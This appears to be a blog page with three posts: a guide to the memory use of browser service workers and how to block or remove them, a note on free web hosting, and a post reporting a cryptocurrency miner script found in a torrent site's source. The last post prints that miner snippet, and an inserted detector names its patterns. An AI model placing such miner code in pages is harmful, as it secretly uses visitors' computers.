Sunday, December 29, 2019

Browser Bloat & Service Workers


Contents  

  1. Introduction
  2. Which Browsers use Service Workers?
  3. See Service Workers
  4. Service Worker Functions
  5. Push Notifications
  6. Check Memory Use
  7. Freeing Memory
    1. Subframes
    2. JavaScript
    3. Memory Monitoring
    4. Manage Extensions
    5. Exclude Extensions from Sync
    6. Restart Your Browser Often
  8. Remove or Block Service Workers
  9. Security Considerations
  10. What are the long term solutions?
  11. Footnotes and Reference Links

1. Introduction

We know multiple tabs and extensions in our browsers use additional memory and CPU resources. But did you know that most web sites you visit now install JavaScript programs called service workers, without your knowledge or consent? They do things like place ads on your desktop that your ad blocker usually can't stop, and each one runs in its own system process, with all the memory and system overhead that entails. These programs can even run after you close the tab or site that installed them, and some restart every time you launch your web browser.

About two weeks ago I launched my Chrome browser, and noticed once again I got a desktop notification ad from a company I ordered something from once. This ad was starting to pop up every time I opened my browser, despite running an ad blocker. I consider desktop notification ads to be particularly annoying, so I opened developer tools, and unregistered the service worker for that site, and a bunch of others from sites I almost never visit, and don't want offline content from. I used Process Hacker to note that Chrome memory usage dropped from about 2.5Gb to 1.1Gb, and with each service worker I deleted, one Chrome process thread went away. While I could have stopped this ad by changing the notification setting for this site, I had no idea the service workers in my browser took so much space!

Some sites like AliExpress had a service worker for each store I'd visited in that site! After restarting the browser, that annoying ad was gone! I repeated this on my Chromebooks and the nasty freezes where the cursor would not move, or barely moved with my track-pad have not happened since.

This started weeks of reading up on service workers, subframes, browser and virtual memory management, leading to some conclusions I think everyone who uses a web browser should know.

2. Which Browsers use Service Workers?

All major web browsers (including Chrome 45+, Firefox 44+, Edge 17+, Safari 11.1+) support service workers [1]. This includes Chromium-based browsers such as Blisk, Brave, Epic, Opera, Slimjet, Vivaldi, etc. Firefox seems to be the only one that allows a user to disable service workers for all sites. The Tor browser 9.02 based on Firefox 68.3.0ESR (Extended Support Release), Basilisk, Pale Moon, and all Firefox ESR releases to date have service workers disabled by default. Service worker memory bloat does not seem to be an issue on mobile operating systems such as Android or iOS, as they don't seem to stay in memory when not in use.

3. See Service Workers

There are several ways to see if you have service workers in your browser. In Chrome and Chromium-based browsers, open a new tab and go to the URL chrome://serviceworker-internals/. In Firefox, use about:serviceworkers. In Edge, use the developer tools, which work in all the other browsers as well, for an individual site.

Here is an example chrome://serviceworker-internals tab in Opera:

In Chrome the above works as well as the Developer tools Application tab:


In Microsoft Edge, there was only the Service Workers tab in developer tools:
As of January 15, 2020 Edge based on Chromium provides the same chrome://serviceworker-internals/ URL as other Chrome browsers.

I don't have access to a Mac, so all I can tell you about Safari is how to enable the developer tools.

4. Service Worker Functions

Service workers can dramatically speed up the loading of a web page, allow the browser to present parts of a page before all the elements have loaded, add offline functionality like offline reading or editing (as with Gmail or Google Docs), conserve bandwidth, and provide notifications (or ads) even when the page is not loaded. Additional examples are in the footnotes [2], including an example service worker with a polite opt-in checkbox [3].

5. Push Notifications

Push notifications are the one feature of service workers most likely to be abused [4]. Here are some requests from a blog site [5] that asked permission to allow notifications.

What they don't tell you is that this also allows them to leave a service worker in your browser for a long time, one that can persist after reboots. If you want to revoke this permission, the easiest way is to use the site settings. This works in most browsers: just click the icon left of the URL (web address) you are visiting, and select Block or Ask by Notifications. (Navigate to Site settings if you don't see that.) Please see Allow Website Notifications POP-UP Scam for detailed instructions for popular browsers.

6. Check Memory Use

Most operating systems (like Windows [6, 7]) and browsers (like Chrome [8] and Firefox [9]) provide a task manager to show the resource consumption (CPU, memory, etc.) of system processes. The browser task managers have the advantage of showing which feature (tab, extension, service worker, subframe, etc.) is associated with a process. (Chrome used to compare its total to other browsers, but that feature was dropped a long time ago.)

Here is an image of the Chrome task manager running under Windows 10 with an AMD Radeon RX 550 graphics card with 4GB of RAM. Note how much larger the GPU process is than the Browser:
Also note the Gmail service worker highlighted in blue.  This is what allows you to continue reading recent email messages after loading your inbox even if your connection drops.  Note the service worker memory footprint is also larger than other extensions and tabs in this example.

Let's look at another task list when visiting https://www.wunderground.com/.
Notice there are 10 processes labeled Subframe highlighted below the weather tab.  These are all portions of that page that come from other sites.  For several reasons Chrome isolates each portion of the page into a separate process.

7. Freeing Memory

Now how do we get back some of the memory all these things take up in our browser?

7.1 Subframes

Let's start with those subframes we were just looking at. The ad blocker running when that was taken was uBlock Origin with default settings. According to this reddit discussion Privacy Badger does a better job of blocking these. Let's see what happens when we switch to that:
This cut the subframes from 10 to 2, and based on their names, I'd guess at least one provides useful content on the page.  Privacy Badger also has a lower memory footprint than uBlock Origin.

7.2 JavaScript

Here is a memory footprint of Chrome running with the  --process-per-site option:
Note how all the tabs have one memory footprint together, but still account for about 1.4Gb of the browser memory.

Here are about the same tabs loaded after blocking JavaScript on just the W3Schools site.
Not many sites are functional without JavaScript; however, this works fine if you're just looking up some syntax details on W3Schools. If you like switching between many tabs, you might use site settings or an add-on like NoScript or JavaScript Switcher to turn off JavaScript when possible to save memory. (Note Mozilla moved Firefox JavaScript controls from the options menu to about:config in 2013.)

7.3 Memory Monitoring

Besides the task managers, memory monitors are handy to provide early warning when memory is running out. I compared the five memory monitors in the Chrome web store and found the one offered by: pd4d10 about tied for lowest memory footprint with the one offered by: dan.belz69. I prefer the tooltip detail in the former, and wish the latter did a restart rather than a refresh on click.

Unfortunately, I have not seen any sites that provide memory footprints for extensions or add-ons.
I simply watched these five in the Chrome task manager to get a feel for their size variations over time.  A more rigorous approach can be found in this comparison of uBlock and ABP.

7.4 Manage Extensions

On reading the article above, I learned that extensions not only took up space themselves, but many increased the size of every tab loaded in the browser. I found that I could regain a great deal of memory by simply disabling extensions in Chrome and Firefox that I'm not using until I need them. For example, now I only enable LastPass (whose degraded functionality has me looking at alternatives) when I change a password, or register one on a new site. This takes a bit longer. I sure would like to see disable added to the remove and hide menus in the extension icon right-click menu in Chrome. [Note to self, figure out where best to submit that idea.]

Now when I add an extension, I also consider the cost-benefit in terms of memory footprint. It is also useful to review browser features, and possibly choose a browser that has features previously only available as extensions built into the browser, like the ad blocking in Brave.

7.5 Exclude Extensions from Sync

After taking inventory of my extensions, I found I had many that I had played with once on one computer that were replicated on many others.  For this reason, I think it is wise to disable sync of extensions in Firefox and Chrome, and manually add them on each system they are used.  This is especially important for Chromebook users.

7.6 Restart Your Browser Often

All browsers seem to take more memory the longer they run. Closing and restarting the browser can free up wasted memory. Chrome has a debug URL, chrome://restart, which will restart your browser and keep your current tabs. This is especially handy on Chromebooks as you can free up memory without having to log into the Chromebook again!

8. Remove or Block Them

Before removing (unregistering) a service worker, consider that it may be hard to get back. Once unregistered, the browser remembers that decision so it may be hard to change your mind later. Most service workers perform their job quickly, and don't hang around in memory. Therefore, I'd try removing the unwanted persistent ones first by blocking notifications.  Then I would close the browser, wait a minute or two, then re-open it with nothing but a blank tab like about:blank, and then see if any persistent  memory hogs are left.

In Firefox you can block all service workers with the about:config setting  dom.serviceWorkers.enabled.  In Chrome (and related browsers) there is the Block Service Workers extension that will prompt you before allowing a service worker to run.  I suggest limiting the number of sites you allow to use notifications to a few whose notifications are most useful.
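The per-site check and removal described in sections 3 and 8 can also be done from the developer tools console. This is an added example, not code from the original post; the function name `auditServiceWorkers` and its `keep` / `remove` options are assumptions made for the sketch, while the browser calls it uses (`getRegistrations`, `pushManager.getSubscription`, `unregister`) are the standard service worker API.

```javascript
// Added example, not from the original post. `auditServiceWorkers` and its
// `keep` / `remove` options are hypothetical names chosen for this sketch.
async function auditServiceWorkers(container, { keep = [], remove = false } = {}) {
  // getRegistrations() only returns workers for the origin of the current page.
  const registrations = await container.getRegistrations();
  const report = [];
  for (const reg of registrations) {
    const worker = reg.active || reg.waiting || reg.installing;
    // A push subscription is what lets the site wake this worker to show a
    // notification when none of its tabs are open.
    const sub = reg.pushManager ? await reg.pushManager.getSubscription() : null;
    let removed = false;
    if (remove && !keep.includes(reg.scope)) {
      removed = await reg.unregister(); // resolves to true on success
    }
    report.push({
      scope: reg.scope,
      script: worker ? worker.scriptURL : null,
      hasPushSubscription: sub !== null,
      removed,
    });
  }
  return report;
}

// In a DevTools console this lists the workers without removing anything.
// Pass { remove: true, keep: [...] } to unregister all but the listed scopes.
if (typeof navigator !== 'undefined' && navigator.serviceWorker) {
  auditServiceWorkers(navigator.serviceWorker).then((rows) => console.table(rows));
}
```

Because the console only sees the origin of the open page, chrome://serviceworker-internals/ or about:serviceworkers remains the place to see every site's workers at once.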

9. Security Considerations

In Chrome 67 Site Isolation was added to defend against web attacks like Spectre and Meltdown, adding another 10 to 13% to the memory footprint. This is one reason multi-process browsers are safer than single-process browsers like Basilisk and Pale Moon, but at a cost of much larger memory use.

Search the web for "MarioNet attack" and you'll find many articles describing undesirable activities service workers could do.  This paper says it isn't a big problem because a "Service Worker can stay alive only for about one minute after the user navigates away from the website".  However, I do not believe this is true if you allow notifications on the site that installs the service worker, and there are many ways a site can nag or trick you into doing so.

10. What are the long term solutions?

Since the early days of the Internet, there has been a constant battle between advertisers, spammers and shoppers for control of their online experience and system resources. One of the factors that led to early Google search engine popularity was that ads were simple and fast plain text links instead of images. Most web developers are paid by the corporations who profit from ads, so are highly motivated to design pages with eye-catching video and interactive features that make it almost impossible to block all unwanted content. Advertisers now detect and block ad blockers, and programmers are responding with anti-blocker blockers. The EU tried to regulate cookie use, but the laws only resulted in "agree or leave notices" on websites, and more subtle tracking and super cookies. Merchandisers bribe shoppers with discounts to install their app which can more easily nag you and violate your privacy, and personal assistants spy on conversations so AI can guess what ads to serve next.

What might change in the future? Will operating systems be re-designed so that the browser will be more closely integrated with virtual memory management? This seems to already be an advantage of mobile device operating system event driven tasking. Will web standards integrate some basic functions typically used in JavaScript into CSS, or will new funding schemes like Basic Attention Tokens (BAT) help solve the ad battle? How about bringing back plain text ads linking to ad content without loading it on the current page?

Will web scraping evolve into meta browsers that scrape what you want off a page, and display a static snapshot until you want to interact with a page again? Could we see something like dynamic link libraries for browsers to re-use common JavaScript code? Will stand-alone programs that don't require the overhead of the browser make a comeback?

Please leave your ideas in the comments!

11. Footnotes and Reference Links

Are Browser Extensions Slowing You Down? - Make Tech Easier

Using the Chrome Task Manager to Find In-Browser Miners

Get an Ad Blocker | Protect Against Websites That Spy - Consumer Reports

  1. Can I use... Service Workers, etc
  2. ServiceWorker Cookbook (with detailed function examples for developers)
  3. Taking the web offline with service workers - mobiForge
  4. Browser push notifications: a feature asking to be abused - Malwarebytes Labs
  5. Example Blog Post that Requests Notifications
  6. Beginner Geek: What Every Windows User Needs to Know About Using the Windows Task Manager
  7. Windows Task Manager: The Complete Guide
  8. How to Use Chrome’s Built-In Task Manager
  9. Task Manager: see what tabs or extensions are slowing down Firefox
  10. Task Manager - see what tabs or extensions are slowing down Firefox | Firefox Help
  11. Service Worker Security FAQ: Why doesn’t Chrome prompt the user before registering a Service Worker?
  12. Debug Background Services With Chrome DevTools
  13. Turn notifications on or off - Computer - Google Chrome Help
  14. Does service worker runs on background even if browser is closed? - Stack Overflow

Last update: 1/16/2020

Saturday, March 9, 2019

Free Web Hosting Services

Have you ever created a little website for an event or group at a bargain introductory price, and then forgotten about it until you notice huge recurring charges applied to your credit card?  I have, so now I stay away from introductory pricing on web sites.  A few years back there seemed to be dozens of places to host a web site for free, but now there are few choices for general purpose sites with rich site building features that don't have some kind of catch or gotcha to get you to upgrade to a premium plan.

I've looked at a number of pages like this one that list free hosting services, but they never seem to reveal the catch or gotcha I'd care about for each provider.
So after trying a few services, and finding the gotchas, I thought I'd start a spreadsheet to track this. Please add information about your favorite free or really cheap hosting sites in the comments, or let me know of any similar comparison charts already out there! Should there be other features important enough to include in the summary, like cron jobs or number of FTP accounts?

You can share this sheet, or view all sheets, with this link: http://bit.ly/freewebh

This is one of the topics I covered in a WordPress talk for CUCUG, and will expand on for RCSI in May.  Please share your thoughts in the comments.

Please share this post with the shortlink: http://bit.ly/CompareFreeHosting

P.S.  I also have a sheet for comparing cheap mobile plans.

Since posting this, many new options have become available besides traditional hosting accounts.  See:

Wednesday, February 13, 2019

TPB mining again

I was helping someone today who was visiting thepiratebay.org, and looking at the source code of the page to troubleshoot an ad-blocker when I ran across this:

<script>
  var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
    threads:4,throttle:0.5, coin: "xmr",
  });
  miner.start();
</script>

Now there's a good reason to block JavaScript on this site!!!
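A page's source can be checked for this kind of inline miner automatically. The following is an added example, not part of the original post: the function name `findMinerScripts`, the pattern list and the sample HTML are constructed here, the site key is a placeholder, and the patterns are heuristics modelled only on the snippet above.

```javascript
// Added example: flag inline <script> blocks that look like the miner above.
// Heuristic patterns based on that one snippet, not a complete signature set.
const MINER_PATTERNS = [
  // new <Namespace>.Anonymous('<long site key>', ...
  { name: 'anonymous-constructor', re: /new\s+[\w$.]+\.Anonymous\s*\(\s*['"][0-9a-zA-Z]{16,}['"]/ },
  // threads / throttle options passed to the miner
  { name: 'threads-or-throttle', re: /\b(?:threads|throttle)\s*:\s*[\d.]+/ },
  // the call that begins mining
  { name: 'start-call', re: /\.\s*start\s*\(\s*\)/ },
];

function findMinerScripts(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let match;
  let index = 0;
  while ((match = scriptRe.exec(html)) !== null) {
    const body = match[1];
    const hits = MINER_PATTERNS.filter((p) => p.re.test(body)).map((p) => p.name);
    // Require the constructor plus one more signal to limit false positives.
    if (hits.includes('anonymous-constructor') && hits.length >= 2) {
      findings.push({ scriptIndex: index, hits });
    }
    index += 1;
  }
  return findings;
}

// Constructed sample page: one harmless script, one miner-shaped script.
const SAMPLE_HTML = `
<html><body>
<script>var player = new Video.Player('intro', {autoplay: false}); player.start();</script>
<script>
  var miner = new CRLT.Anonymous('PLACEHOLDERSITEKEY0000000000', {
    threads: 4, throttle: 0.5, coin: "xmr",
  });
  miner.start();
</script>
</body></html>`;

console.log(findMinerScripts(SAMPLE_HTML));
```

Only scripts written directly in the page are matched; a miner loaded from an external file or obfuscated before it runs needs a content blocker or the browser task manager's CPU column to catch it.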